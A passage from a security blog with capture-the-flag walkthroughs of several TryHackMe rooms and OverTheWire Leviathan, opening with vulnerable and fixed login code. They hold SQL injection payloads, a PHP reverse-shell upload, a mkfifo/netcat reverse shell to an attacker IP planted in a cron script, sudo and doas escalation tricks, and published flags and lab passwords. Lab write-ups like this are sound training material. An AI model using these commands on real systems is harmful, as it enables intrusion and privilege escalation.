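        return "SQL injection detected"
    exists = db.execute(
        f"SELECT 1 FROM users WHERE username = '{username}'"
    ).fetchone()
    if exists is None:
        return "Invalid username or password"
    authed = db.execute(
        f"SELECT 1 FROM users WHERE username = '{username}' AND password = '{password}'"
    ).fetchone()
    return "Welcome" if authed else "Invalid password"


def login_fixed(db, username, password):
    """Parameterised query and one generic message for every failure."""
    authed = db.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?", (username, password)
    ).fetchone()
    return "Welcome" if authed else "Invalid username or password"


def enumerate_users(login, db, candidates):
    """What the Intruder run did: compare each candidate's response with the response
    for a name that certainly does not exist; any difference leaks a valid username."""
    baseline = login(db, "no-such-user-zz", "test")
    return [name for name in candidates if login(db, name, "test") != baseline]


if __name__ == "__main__":
    db = make_db()
    print(enumerate_users(login_vulnerable, db, ["admin", "martin", "root"]))  # ['martin']
    print(login_vulnerable(db, "martin'-- ", "anything"))                      # Welcome
    print(enumerate_users(login_fixed, db, ["admin", "martin", "root"]))       # []
    print(login_fixed(db, "martin'-- ", "anything"))                           # Invalid username or password
```

Note that the blocklist still catches the textbook payloads, exactly as the room's filter did, and is still useless against a payload that never contains any of its keywords; the parameterised query is what actually closes the injection, and the single message is what closes the enumeration.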
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"20 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/lesson-learned-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LESSON LEARNED-TRY HACK ME-ROOM","type":"writeups"},{"content":" GALLERY-TRY HACK ME-ROOM\nHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Gallery”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start by visiting the victim IP and we see the default Apache page.\nNow moving to nmap:\nnmap 10.10.80.251 -O -sV\nPorts 80 and 8080 open. 
Port 80 was nothing major, so I checked 8080.\nOpened http://10.10.80.251:8080, which displayed a simple login form.\nEntered a SQL injection payload into the form:\nUsername: admin' or 1=1 #\nClicking enter we are in the CMS portal: Simple Image Gallery.\nInside the dashboard, went to User Profile and found an Upload section (the avatar upload accepted a .php file, which the server then executed).\nPrepared a PHP reverse shell payload (php-rev-shell.php) and uploaded it.\nIn my terminal:\nnc -lvnp 4444\nTriggered the file in the browser and got a shell connection back.\nThen stabilizing the shell, as I had some unresponsive states and errors:\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nThen Ctrl+Z, and in the local terminal:\nstty raw -echo; fg\nreset\nNow inside the shell:\ncd /home/mike\nls -la\ncat user.txt\nIt shows permission denied.\nI immediately head to /var -\u0026gt; /backup\ncat .backup_history\nsudo -l\nb3stpassw0rdbr0xx\nThis is a shell history file: mike ran sudo -l and then typed his password at the command line, so it was recorded in clear text. Interpreted as the password b3stpassw0rdbr0xx for mike.\nUsing this password to access mike:\nsu mike\nb3stpassw0rdbr0xx\nAfter login:\ncd /home/mike\ncat user.txt\nThen we get the user.txt flag:\nTHM{af05cd30bfed67849befd546ef}\nNow moving to root escalation.\nChecking sudo -l\nOutput: allowed sudo /bin/bash /opt/rootkit.sh without password.\nViewed the script:\ncat /opt/rootkit.sh\nSaw it used nano for editing, and nano runs as root here, so the GTFOBins nano trick applies.\nRun:\nsudo /bin/bash /opt/rootkit.sh\nInside nano, use the read-file command to inject a shell:\nCtrl+R, then Ctrl+X (execute command), press enter, then paste this:\nreset; sh 1\u0026gt;\u0026amp;0 2\u0026gt;\u0026amp;0\nPress enter and you will see the # prompt (the 1\u0026gt;\u0026amp;0 2\u0026gt;\u0026amp;0 redirections point the shell’s stdout and stderr at nano’s terminal so its output is visible).\nNow in the shell enter /root:\ncd /root\nls -la\ncat root.txt\nTHM{ba87e0dfe5903adfa6b8b450ad7567bafde87}\nNow we need to find the admin password hash, so for that I followed the script which I came across in a video by Tyler Rambsey.\nIn terminal:\nwget https://raw.githubusercontent.com/musyoka101/Simple-Image-Gallery-1.0-blind-SQL-Injection/.../exploit.py\nThen:\nchmod +x exploit.py\nRunning the script (it extracts the hash one character at a time through blind SQL injection, which is why it takes a while):\npython3 exploit.py http://10.10.80.251:8080/\nAfter 3–4 minutes we get the output:\na228b12a08b6527e7978cbe5d914531c\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through 
it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"13 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/gallery-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"GALLERY-TRY HACK ME-ROOM","type":"writeups"},{"content":" CTF-COLLECTION-VOLUME 2\nHello everyone! This is a medium-level room from the TryHackMe platform titled “CTF Collection Vol 2”, shoutout to DesKel for putting this amazing room out. It was actually super fun working on this.\nI hope this write-up helps guide you through the process!\nI have also put the flags in order towards the end.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nAfter loading the page, I first started scrolling through the page and a shiny red button caught my eye.\nClicking it opened a new tab — and bam, flag #1 appeared:\nTHM{1_c4n’7_b3l13v3_17} -\u0026gt; Easter 13\nNext the classic! 
I checked /robots.txt and came across a hex string; a simple decode through CyberChef gives the flag:\nTHM{4u70b07_r0ll_0u7} -\u0026gt; Easter 1\nAbove that hex, I discovered a mysterious Base64 string.\nAfter four rounds of Base64 decoding, I got DesKel_secret_base.\nVisiting that path led me to a secret image of the SUPREME LEADER.\nInspecting the page source I uncovered the next flag:\nTHM{f4ll3n_b453} -\u0026gt; Easter 2\nNext, as per the Easter 4 hint, I ran the directory buster using the common.txt wordlist:\ngobuster dir -u http://10.10.98.47/ -w common.txt\nThat led me to /small, where I struck gold and got the flag for Easter 19:\nTHM{700_5m4ll_3yy} -\u0026gt; Easter 19\nThen accessing /login, I tried typical SQLi tricks, but no dice. The flag was hiding in the HTML source instead:\nTHM{y0u_c4n’7_533_m3} -\u0026gt; Easter 3\nThen moving to Easter 4, the hint suggested SQLi and I decided to use sqlmap for it.\nFirst I launch Burp Suite on the login page and capture the POST request while trying some basic credentials.\nThen right click, save the request to a file (a in my case), and pass it to sqlmap with -r so it injects into the captured parameters:\nsqlmap -r a --current-db\nWe see the database found as: THM_f0und_m3\nNow to list the tables in it:\nsqlmap -r a -D THM_f0und_m3 --tables\nThen I see the table names: user \u0026amp; nothing_inside. 
I decide to check user first:\nsqlmap -r a -D THM_f0und_m3 -T user --dump\n(--columns only lists the column names; --dump retrieves the rows.) This gives the username and password:\n'DesKel,05f3672ba34409136aa71b8d00070d1b'\nThe password is clearly a hash (32 hex characters, so MD5), which needs to be cracked rather than decoded, so I paste it into CrackStation and it comes back as “cutie”.\nAnd I get the flag for Easter 5:\nTHM{wh47_d1d_17_c057_70_cr4ck_7h3_5ql} -\u0026gt; Easter 5\nNow going with the other table:\nsqlmap -r a -D THM_f0und_m3 -T nothing_inside --columns\nWe see the column Easter_4:\nsqlmap -r a -D THM_f0und_m3 -T nothing_inside -C Easter_4 --sql-query \"select Easter_4 from nothing_inside\"\nThis gives the flag:\nTHM{1nj3c7_l1k3_4_b055} -\u0026gt; Easter 4\nNext, with the hint for Easter 6, I’m going to use curl to fetch the HTTP response headers into a file:\ncurl -s http://10.10.98.47 -D headers.txt\nFound a header containing:\nTHM{l37'5_p4r7y_h4rd} -\u0026gt; Easter 6\nNext, the clue mentions “cookies”, so I inspect the page and head to the cookies.\nFound a cookie (visited=0).\nChanged the value to 1 (the server trusts a client-controlled cookie to decide what to show).\nReloaded the page → flag displayed:\nTHM{w3lc0m3!_4nd_w3lc0m3} -\u0026gt; Easter 7\nThe next challenge is related to the User-Agent header.\nUsed Burp to capture the request and modified User-Agent: to a custom string.\nTHM{h3y_r1ch3r_wh3r3_15_my_k1dn3y} -\u0026gt; Easter 8\nThe next one hints “moves fast”. Since I did a light recon by scrolling through and seeing the functionality, I remembered seeing a quick double redirection (if I may term it that way).\nSo clicking the red button, on the 1st redirect I inspect the page and see the flag there:\nTHM{60nn4_60_f457} -\u0026gt; Easter 9\nThe next one gives us a hint about the Referer header.\nI see the gift voucher page, which is the free sub, capture the request in Burp Suite and send it to Repeater.\nThen, as hinted, I add the header Referer: tryhackme.com\nTHM{50rry_dud3} -\u0026gt; Easter 10\nThen I couldn’t control myself and had to go play the game which I saw during my scrolling sessions lol\nI went through it and it 
seemed like a little puzzle just to decode. For this specific challenge I took the manual route, which I do not recommend as it isn’t the conventional route:\nFrom my solvings I found: v=14, a=89, e=93, M=77, r=10, 9=14, 5=10, O=126, G=51\nand that spells GameOver, which led me to the flag:\nTHM{ju57_4_64m3} -\u0026gt; Easter 15\nGoing to game 2, it says press all 3 buttons together.\nSo I immediately launch Burp, capture the request and send it to Repeater. Then just modify the request body to ensure all 3 buttons are submitted as input (the HTML form only lets you submit one button at a time, but the server just reads the POST parameters):\nbutton1=button1\u0026amp;submit=submit\u0026amp;button2=button2\u0026amp;submit=submit\u0026amp;button3=button3\u0026amp;submit=submit\nThat gives me the flag:\nTHM{73mp3r_7h3_h7ml} -\u0026gt; Easter 16\nNext, back in the page, inspecting it I see the long binary numbers. It is base 2, so convert to decimal.\nIn the terminal start python:\npython3\nb='0101' =\u0026gt; d=int(b,2)\nThen, getting the decimal, I take it and convert it to hex using an online tool, followed by hex to ASCII (the decimal step is just an intermediate representation; binary, decimal and hex are the same bytes written three ways).\nTHM{j5_j5_k3p_d3c0d3} -\u0026gt; Easter 17\nThen going back to Easter 11, utilizing egg I guess has to be the only way, so in the menu I try selecting the DesKel option and it shows “how dare you?”.\nI launch Burp Suite, capture the request and in Repeater I modify the food item to egg.\nThat leads me to the flag:\nTHM{366y_b4k3y} -\u0026gt; Easter 11\nThen the Easter 12 challenge hint says fake js file, so I inspect the page and the jQuery file immediately catches my attention.\nClicking on it I see a string which is hex, and converting it I get the flag:\nTHM{h1dd3n_j5_f1l3} -\u0026gt; Easter 12\nThen Easter 14 is to do with image rendering and we will use CyberChef to solve this.\nWe take the entire base64 string (embedded directly in the page) and put it in CyberChef; to bake it we use the Render Image operation and we see the THM logo with the flag right there:\nTHM{d1r3c7_3mb3d} -\u0026gt; Easter 14\nNow moving to Easter 18:\nI see an egg pan picture, it says say yes to 
egg.\nI launch Burp Suite, capture the request and have it in Repeater; here I modify the request by putting:\negg:yes\nAfter sending the request, it immediately gives the flag:\nTHM{70ny_r0ll_7h3_366} -\u0026gt; Easter 18\nNow for the final flag, which is Easter 20.\nAt the bottom of the source there is a username and password for a POST request for Easter 20, already giving us the credentials.\nNow I am going to use curl again and get the flag:\ncurl -s -d \"username=DesKel\u0026amp;password=heIsDumb\" -X POST http://10.10.98.47/ | grep -A1 \"easter 20\"\n-d \"username=DesKel\u0026amp;password=heIsDumb\": data payload sent via POST. This mimics a login form submission with credentials username = DesKel, password = heIsDumb.\n-X POST: specifies the HTTP method to use, POST (with -d curl would default to POST anyway).\n| grep -A1 \"easter 20\": the pipe passes the HTML output of the server to grep, which searches for \"easter 20\" in the returned HTML; -A1 tells grep to also print 1 line after the matching line (which contains the flag).\nAnd I get the flag:\nTHM{17_w45_m3_4ll_4l0n6} -\u0026gt; Easter 20\nALL FLAGS\nEaster 1: THM{4u70b07_r0ll_0u7}\nEaster 2: THM{f4ll3n_b453}\nEaster 3: THM{y0u_c4n’7_533_m3}\nEaster 4: THM{1nj3c7_l1k3_4_b055}\nEaster 5: THM{wh47_d1d_17_c057_70_cr4ck_7h3_5ql}\nEaster 6: THM{l37'5_p4r7y_h4rd}\nEaster 7: THM{w3lc0m3!_4nd_w3lc0m3}\nEaster 8: THM{h3y_r1ch3r_wh3r3_15_my_k1dn3y}\nEaster 9: THM{60nn4_60_f457}\nEaster 10: THM{50rry_dud3}\nEaster 11: THM{366y_b4k3y}\nEaster 12: THM{h1dd3n_j5_f1l3}\nEaster 13: THM{1_c4n’7_b3l13v3_17}\nEaster 14: THM{d1r3c7_3mb3d}\nEaster 15: THM{ju57_4_64m3}\nEaster 16: THM{73mp3r_7h3_h7ml}\nEaster 17: THM{j5_j5_k3p_d3c0d3}\nEaster 18: THM{70ny_r0ll_7h3_366}\nEaster 19: THM{700_5m4ll_3yy}\nEaster 20: THM{17_w45_m3_4ll_4l0n6}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nThough it was a medium level room, it was fun to work on the challenges. Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. 
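Several of the flags in this room (Easter 1, 2, 12 and 17 above) are the same task in different clothes: a string wrapped in one or more layers of hex, Base64 or binary. The Python below is an added example of mine, not code from the room or this writeup, that does what CyberChef's magic recipe does: it tries each decoding in turn, keeps a result only if it comes out as printable ASCII, and repeats until nothing decodes further, so the four nested Base64 layers of Easter 2 peel off in one call and the binary of Easter 17 goes straight to text without the detour through decimal and hex. The sample inputs are constructed with the block's own encode_layers helper rather than taken from the room; DesKel_secret_base is reused only as a recognisable plaintext.

```python
import base64
import binascii
import re
import string

PRINTABLE = set(string.printable)


def looks_like_text(data):
    """Accept a decoding only if the result is plain printable ASCII."""
    try:
        return all(ch in PRINTABLE for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def try_binary(s):
    # "01001000 01101001" (spaces optional) -> b"Hi"; this is the Easter 17 route without
    # the detour through decimal and hex: int(bits, 2) already holds the bytes
    bits = s.replace(" ", "")
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        return None
    return int(bits, 2).to_bytes(len(bits) // 8, "big")


def try_hex(s):
    s = s.replace(" ", "")
    s = s[2:] if s.startswith("0x") else s
    if len(s) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    return bytes.fromhex(s)


def try_decimal(s):
    # a big decimal integer is just another spelling of the same bytes
    if not s.isdigit():
        return None
    n = int(s)
    return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")


def try_base64(s):
    if len(s) < 4 or len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        return base64.b64decode(s, validate=True)
    except binascii.Error:
        return None


# Most specific alphabet first, so a hex blob is not mistaken for Base64
LAYERS = (("binary", try_binary), ("hex", try_hex), ("decimal", try_decimal), ("base64", try_base64))


def peel(blob, max_rounds=16):
    """Strip encoding layers until no layer yields printable text. Returns (text, layers)."""
    current = blob.strip()
    applied = []
    for _ in range(max_rounds):
        for name, fn in LAYERS:
            out = fn(current)
            if out is not None and looks_like_text(out):
                applied.append(name)
                current = out.decode("ascii").strip()
                break
        else:
            break  # nothing decoded this round: we are at plain text
    return current, applied


ENCODERS = {
    "binary": lambda b: " ".join(f"{byte:08b}" for byte in b),
    "hex": lambda b: b.hex(),
    "decimal": lambda b: str(int.from_bytes(b, "big")),
    "base64": lambda b: base64.b64encode(b).decode(),
}


def encode_layers(text, layers):
    """Build constructed samples for the example: apply the named encodings in order."""
    data = text.encode()
    for name in layers:
        data = ENCODERS[name](data).encode()
    return data.decode()


if __name__ == "__main__":
    print(peel("01001000 01101001"))                                   # ('Hi', ['binary'])
    print(peel(encode_layers("DesKel_secret_base", ["base64"] * 4)))  # four base64 layers off
```

The printable-ASCII check is what stops the loop: a flag like THM{...} contains characters outside every encoding alphabet, so no layer matches and the text is returned as-is. It is also the weak spot, since a short word that happens to be valid Base64 and decodes to printable bytes will be peeled one step too far, which is why the layers list is returned alongside the text.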
I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"8 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ctf-collection-volume-2/","section":"Security Labs \u0026 Writeups","summary":"","title":"CTF-COLLECTION-VOLUME 2","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Plotted” PLOTTED-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Plotted”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nWe start by loading the target IP:\nhttp://10.10.172.50\nIt displays a default Apache page, so we move to enumeration\nImmediately kicking in nmap:\nnmap -O -sV 10.10.172.50Open ports:22 (SSH)80 (HTTP)445 (HTTP again, possibly misconfigured or bound differently)Run directory buster on both ports 80 \u0026amp; 445\ngobuster dir -u http://10.10.172.50 -w /usr/share/dirb/wordlists/common.txtFinds:\n/admin → Base64-encoded hint/passwd, /shadow → Fake but suggest file system spoofinggobuster dir -u http://10.10.172.50:445 -w /usr/share/dirb/wordlists/common.txtFinds:\n/management → Bingo!!Then visiting the above:\nhttp://10.10.172.50:445/managementIt leads to a Traffic Offense Management System\nTry classic SQL injection at login:\nadmin’ or 1=1 #It works and leads us in the page which looks like the admins portal\nIn the profile section, there’s a file upload field for avatars.\nUse a PHP reverse shellModify IP and port accordinglyUpload the PHP reverse shell, trigger it via web browser:\nhttps://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.phpThen opening listener in the terminal :\nnc -lvnp 4444Catch the Shell and then we upgrade shell:\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’This upgrades your “dumb” shell to a fully interactive TTY (Teletypewriter) shell.\npython3 -c '...': This executes the Python code within the single quotes.import pty: This imports the pty module in Python. The pty module provides functions for pseudo-terminal utilities.pty.spawn(\"/bin/bash\"): This is the core of the command. It spawns a new process, in this case, /bin/bash (the Bash shell), and connects its controlling terminal to the current process's standard I/O through a pseudo-terminalNavigate to user home:\ncd /homels -lacd plot_admincat user.txtBut we get: # Permission denied\nLet’s check scheduled tasks:\ncat /etc/crontab/etc/crontab: This specific file is the system-wide crontab. 
It contains jobs scheduled by the system administrator or installed by various software packages. Unlike user-specific crontabs, the /etc/crontab file has an additional field for the user under which the command should be executed.\nThen I find:\nplot_admin /var/www/scripts/backup.sh\nBack in shell:\ncd /var/www/scriptsrm backup.shCreate new malicious backup.sh(In another terminal tab):\nnano backup.shPaste this rev shell payload:\nrm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2\u0026gt;\u0026amp;1 | nc 10.9.1.119 5555 \u0026gt;/tmp/fServe it with Python:\npython3 -m http.serverBack in compromised shell:\nwget http://10.9.1.119:8000/backup.sh -O backup.shchmod +x backup.shStart another listener:\nnc -lvnp 5555Wait for the cronjob to execute — then you catch a new shell\nFrom the new shell:\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’cd /home/plot_admincat user.txt77927510d5edacea1f9e86602f1fbadbNow to escalate privilege:\nThis system is running OpenBSD and uses doas (similar to sudo)\ncat /etc/doas.confThen we see this: permit nopass plot_admin as root cmd /usr/bin/openssl\nThis means you can run OpenSSL as root.\nCheck GTFOBins OpenSSL → we can use it to read root files.\nopenssl | GTFOBinsIt can send back a reverse shell to a listening attacker to open a remote network access. It can exfiltrate files on…gtfobins.github.ioLFILE=/root/root.txtdoas -u root openssl enc -in “$LFILE”Then we get the root flag:\n53f85e2da3e874426fa059040a9bdcabCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/plotted-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"PLOTTED-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bugged” BUGGED-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bugged”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nWe start by loading the victim IP and performing nmap:\nnmap -p1-2000 --min-rate=1000 -T4 -Pn 10.10.101.222-p1-2000=\u0026gt;Scan ports 1 to 2000 (faster, smaller range)\n--min-rate=1000=\u0026gt;Force at least 1000 packets/second (fast scan)\n-T4=\u0026gt;Use aggressive timing (fast but stable)\n-Pn=\u0026gt; Skip ping — assume host is up\nPort 1883 open → this is MQTT, a lightweight messaging protocol often used in IoT.\nNow, install Mosquitto (MQTT client tools):\nsudo apt install mosquitto mosquitto-clientsNext, connect to MQTT Broker:\nmosquitto_sub -h 10.10.101.222 -t “#” -v# → wildcard to subscribe to all topics.-v → show topic names with message.\nThen while the appliances are showing up I see the base 64 string which catches my attention, so going to CyberChef and decoding the base 64 string:\n{\"id\": \"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\", \"registered_commands\": [\"HELP\", \"CMD\", \"SYS\"], \"pub_topic\": \"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub\", \"sub_topic\": \"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub\"}\nNow using pub_topic:\nmosquitto_pub -t U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub -h 10.10.101.222 -m “hello”This shows “hello” as it is and not encoded\nTrying out the sub_topic:\nmosquitto_pub -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -h 10.10.101.222 -m “hello”Now we get a base64-encoded string and when I decode it there is an error statement but that gives us the hint\nUsing the data we have from the initial output and recrafting:\n{\"id\": \"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\", \"cmd\": \"CMD\", \"arg\": \"ls\"}\nand converting it to base-64:\neyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==\nNow sending it:\nmosquitto_pub -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -h 10.10.101.222 -m “eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==”The response shows the flag.txt file existing since we gave ls as the query\nNow we reconstruct the command so as to read the flag.txt file and get 
the flag\nThis is the encoded base-64:\neyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0=\nand now sending it :\nmosquitto_pub -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -h 10.10.101.222 -m “eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0=”That leads us to the flag:\nflag{18d44fc0707ac8dc8be45bb83db54013}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/bugged-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"BUGGED-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “W1SE GUY” W1SE GUY-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “W1SE GUY”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nWe start by visiting the target room and downloading the file provided.\nInside the file, we see a fake flag string along with a hint:\nAs per the challenge instructions:Port 1337 is open — and we can connect to it with Netcat.\nnc 10.10.254.116 1337It displays\nXOR Encrypted Text:24231f1805410a3e0d013513262201045f31081631052050141c272b0b20021f2b530002131d1108\nUnderstand XOR EncryptionHow XOR works in simple terms:\nIt’s a reversible operation:Plaintext ⊕ Key = CiphertextCiphertext ⊕ Key = PlaintextIf you know either the plaintext format or the key, you can recover the other.In this challenge, we know the flag format is always: THM{…….}\nSo we can XOR “THM{“ against the first few bytes of the ciphertext to recover the key\nThe XORED Value:\n24231f1805410a3e0d013513262201045f31081631052050141c272b0b20021f2b530002131d1108Go to CyberChefSelect From Hex → XOR → To HexInput the Xored Value into the Input field.For Key:First, copy the first 8 hex characters → 24231f18XOR it against \"THM{\" → this gives \"pkRc\" — your starting key.Now use \"pkRc\" as the key in CyberChef.Paste the full Xored Value.Start appending additional characters to the key (0–9 \u0026amp; a-z) to fully decrypt the message.When you try \"pkRcu\":The full decrypted flag is revealed:THM{P1alnTExtATt4ckCAnr3AlLyhurty0UrxOr}Next,\nBack in the terminal prompt enter: pkRcu\nIt responds with the final flag:\nTHM{BrUt3_ForC1nG_XOR_cAn_B3_FuN_nO?}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"29 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/w1se-guy-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"W1SE GUY-TRY HACK ME-ROOM","type":"writeups"},{"content":" Leviathan is a great beginner-friendly wargame from OverTheWire that introduces local enumeration, binary exploitation, and basic privilege… OVER THE WIRE — LEVIATHANLeviathan is a great beginner-friendly wargame from OverTheWire that introduces local enumeration, binary exploitation, and basic privilege escalation — all in a safe CTF-style lab.\nTo work on this, we will need to enter through SSH access.\nAs mentioned in the website, we need to use port 2223 and ssh into it\nLevel 0 credentials are already given:\nUsername: leviathan0Password: leviathan0\nssh leviathan0@leviathan.labs.overthewire.org -p 2223# Password: leviathan0Once in :\nTo see the files present\ncd /etc/leviathan_passls -ladrwxr-x — — 2 leviathan1 leviathan0 4096 Apr 10 14:23 .backupcd .backupls -la-rw-r — — 1 leviathan1 leviathan0 133259 Apr 10 14:23 bookmarks.htmlNow in this bookmarks.html, we need to find the password and we are using grep for that:\ncat bookmarks.html | grep password\u0026lt;DT\u0026gt;\u0026lt;A HREF=”http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is 3QJ3TgzHDq” ADD_DATE=”1155384634\" LAST_CHARSET=”ISO-8859–1\" ID=”rdf:#$2wIU71\"\u0026gt;password to leviathan1\u0026lt;/A\u0026gt;\nThe password: 3QJ3TgzHDqNow moving on to the next challenge:\nssh leviathan1@leviathan.labs.overthewire.org -p 2223Then we use ls to see the files present\nls -laHere we see: check\nso I perform cat check\nbut that shows compiled binaries so I perform :\nstrings checkand this catches my eyes:\n__gmon_start__secrlovepassword: /bin/shWrong password, Good 
Bye …\nBut strings doesn’t tell us how the program checks the password. So we move to:\nltrace ./checkWhy ltrace?\nIt shows dynamic function calls from shared libraries like strcmp(), printf(), getchar(), etc.It’s perfect for spotting what your input is compared to inside a binary.It prompts for a password: I try pass but it shows wrong password but then I notice what’s written in the message “strcmp”\nThe binary is comparing your input pass to the hardcoded string \"sex\"\nNow running it again and entering the password correctly while running it:\n./checkpassword: sexit gives you shell access and we know that because we see this also: system(“/bin/sh”)\ncd /etc/leviathan_passls -lawe see: leviathan2\ncat leviathan2and BOOM! we get the password\nNsN1HwFoyNNow onto the next challenge:\nssh leviathan2@leviathan.labs.overthewire.org -p 2223ls -laHere I see: printfile\nltrace ./printfileI try ltrace printfile but nothing:\n__libc_start_main(0x80490ed, 1, 0xffffd484, 0 \u0026lt;unfinished …\u0026gt;puts(“*** File Printer ***”*** File Printer ***) = 21printf(“Usage: %s filename\\n”, “./printfile”Usage: ./printfile filename) = 28+++ exited (status 255) +++\ncd homels -laNow while looking at the access levels granted: /tmp has root access so I create a file pass i.txt\nnano “/tmp/pass i.txt”then\n./printfile “/tmp/pass i.txt”This is the password:\nf0n8h2iWLPCONCLUSION:This was a short write-up covering the first three challenges in Leviathan. 
